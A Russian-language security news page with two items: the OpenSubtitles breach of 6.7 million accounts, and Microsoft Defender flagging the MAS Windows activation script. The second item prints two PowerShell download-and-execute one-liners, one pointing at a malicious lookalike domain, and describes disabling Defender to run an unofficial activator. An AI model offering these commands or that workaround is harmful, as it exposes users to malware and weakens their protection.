Проект OpenSubtitles рассказал об утечке, затронувшей 6,7 млн пользователей

Проект OpenSubtitles рассказал об утечке, затронувшей 6,7 млн пользователей

Проект OpenSubtitles рассказал об утечке, затронувшей 6,7 млн пользователей

Веб-сайт OpenSubtitles, предоставляющий любителям кинематографа бесплатные субтитры, рассказал о взломе и утечке данных, которые произошли в прошлом году. Чтобы скрыть факт проникновения хакеров, владельцам ресурса пришлось заплатить злоумышленникам.

Представители OpenSubtitles рассказали общественности о взломе после того, как кто-то загрузил копию украденных файлов в Сеть. В итоге скомпрометированную информацию проиндексировал онлайн-сервис HaveIBeenPwned.

По словам OpenSubtitles, в ходе киберинцидента пострадали данные 6 783 158 пользователей, зарегистрированных на соответствующем сайте. Киберпреступникам удалось добраться до адресов электронной почты, юзернеймов и MD5-хешей паролей.

«Мы создали сайт в 2006 году, имея слабое представление о кибербезопасности, поэтому пароли были украдены в MD5-хешах без соли», — гласит официальный пост на форуме.

Это значит, что большинство украденных паролей будет легко перевести в вид простого текста. Тем не менее администраторы OpenSubtitles заверили, что разработчики обновили код для лучшей защиты аккаунтов. Теперь всем пользователям рекомендуется поменять пароли на ресурсе.

Поскольку платёжные данные хранились за пределами веб-площадки, злоумышленники не смогли до них добраться. Помимо этого, стало известно, что владельцы OpenSubtitles заплатили хакерам выкуп в криптовалюте. Сам инцидент произошёл в августе 2021 года.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru